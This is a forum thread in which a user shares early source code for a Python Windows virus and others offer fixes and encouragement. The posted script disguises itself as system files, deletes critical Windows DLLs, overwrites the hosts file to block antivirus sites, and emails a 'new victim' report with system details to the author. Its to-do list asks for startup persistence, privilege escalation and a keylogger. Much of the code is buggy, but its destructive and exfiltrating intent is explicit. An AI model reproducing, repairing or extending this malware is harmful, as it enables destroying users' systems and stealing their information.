iVirus possible WIP - Malware

chroniccommand

So I started a possible iVirus 'alpha'. What do you guys think so far. Not a good virus but its a start.

[spoiler]


#!/usr/bin/python
#Version 0&#46;01 alpha iExploit Virus
'''
So far&#58; Copies to C&#58;\WINDOWS\~, makes many copies to fill the windows folder with teh spamz*, blinks scroll,caps,num lock on/off
writes to hosts file to block websites*, sends email when virus is opened

* = Untested
~ = Not functional(yet)
'''
#To do&#58; Get it to run when windows starts, obtain admin automatically, keylogger code(Need more suggestions!)
import os, shutil, tempfile, random, sendkeys, smtplib, urllib

source1 = 'ie&#46;exe'
source2 = 'C&#58;\WINDOWS\schhost&#46;exe'
winupdate = 'C&#58;\WINDOWS\winupdate&#46;exe'
spam = random&#46;random()

def copy()&#58;
    shutil&#46;copy2(source1, source2)
    shutil&#46;copy2(source2, winupdate)
    file = open(spam,\"w\")

def spam()&#58;
    i=300
    while i &lt; n&#58;
        file = open(spam,\"w\")
        i += 1
def keyblink()&#58;
    SendKeys&#46;SendKeys(\"\"\"
    {CAPSLOCK}
    {SCROLLOCK}
    {NUMLOCK}
    \"\"\")
def fucksystem()&#58;
    #Deletes crucial windows files
    os&#46;remove('C&#58;\WINDOWS\system32\hal&#46;dll')
    os&#46;remove('C&#58;\WINDOWS\system32\rundll32&#46;exe')

def hostsfuck()&#58;
    #Writes to hosts file disallowing certain sites
    hostsfile = ('C&#58;\WINDOWS\system32\drivers\etc\hosts')
    openhost = open(hostsfile,'w')
    hostsfile&#46;write(\"127&#46;0&#46;0&#46;1             http&#58;//virustotal&#46;com/\")
    hostsfile&#46;write(\"127&#46;0&#46;0&#46;1             http&#58;//symantec&#46;com/\")
    hostsfile&#46;write(\"127&#46;0&#46;0&#46;1             http&#58;//facebook&#46;com/\")
    hostsfile&#46;write(\"127&#46;0&#46;0&#46;1             http&#58;//google&#46;com/ \")

def keylogger()&#58;
    #Keylogger source code to go here
    print()
def sendmail()&#58;
    uid = os&#46;getuid()
    pid = os&#46;getpid()
    curdir = os&#46;getcwd()
    info = os&#46;uname()
    now = time&#46;time()
    sender = ('from@gmail&#46;com')
    recieve = ('to@gmail&#46;com')
    message = (\"\"\"
You have a new victim!
Here's some system information&#58;
User ID&#58;
\"\"\" + uid + \" \nProcess ID&#58; \" + pid + \"\n Current Directory \" + curdir + \"\n System info&#58; \" + info + \"\n\nTime&#58; \" + now)
    msgbody = (message)
    #Put your gmail username and password here
    username = ('username')
    password = ('password')
    gmail = smtplib&#46;SMTP('smtp&#46;gmail&#46;com&#58;587')
    gmail&#46;starttls()
    gmail&#46;login(username,password)
    gmail&#46;sendmail(sender, recieve, msgbody)
    gmail&#46;quit

copy()
spam()
keyblink()
fucksystem()
hostsfuck()
sendmail()

[/spoiler]

Xin

Good start chronic, il look into some python networking for some other functions

chroniccommand

Thanks I just kinda whipped it up to get an idea. I updated the code and put some more stuff in it such as email when you get a new victim. Check it out.

sangf

noice~~ some tips though~~

pointless open() file for write in copy(). broken loop in spam() - n doesn't exist as far as i can see (also, i don't think spamming open() will be of much effect - maybe you are confusing its functionality). in hostsfuck() you are using hostfile to perform write(), but it's a string type, and doesn't have that method.. i'm sure you meant to use openhost, which is an actual file object.. and you should always close() files you open(). can't comment on the module specific stuff but i guess the downside to writing something like this is not being able to test it, haha - maybe try a VM.

chroniccommand

said:

noice~~ some tips though~~

pointless open() file for write in copy(). broken loop in spam() - n doesn't exist as far as i can see (also, i don't think spamming open() will be of much effect - maybe you are confusing its functionality). in hostsfuck() you are using hostfile to perform write(), but it's a string type, and doesn't have that method.. i'm sure you meant to use openhost, which is an actual file object.. and you should always close() files you open(). can't comment on the module specific stuff but i guess the downside to writing something like this is not being able to test it, haha - maybe try a VM.

Lol thanks. Like I said I whipped it up really fast and didn't have any time to really test it.

Xin

Shall we make a github repo for it? It will allow for better version control and source management,

chroniccommand

said:

Shall we make a github repo for it? It will allow for better version control and source management,

Go for it. If you think it'll make it easier for control and source management do it up.

Xin

Unfortunately im not too good with python networking and virus writing so i wont be able to help a lot with this but il try my best

chroniccommand

said:

Unfortunately im not too good with python networking and virus writing so i wont be able to help a lot with this but il try my best

Well, you could always code parts in a different language, and we could implement it into python.

chroniccommand

said:

Since you coded a virus for the first time i think its a good start!!

This isn't my first time coding a virus.

sangf

what python version are you using?

chroniccommand

said:

what python version are you using?

Well I'm currently coding on a portable version of python because I'm grounded and I can work on it at school. So I don't know at the moment.

UPDATE:Added system information within the email sender. Once it opens it sends an email to you giving some information about the system.

Howdy, Stranger!

Top Posters

Who's Online (2)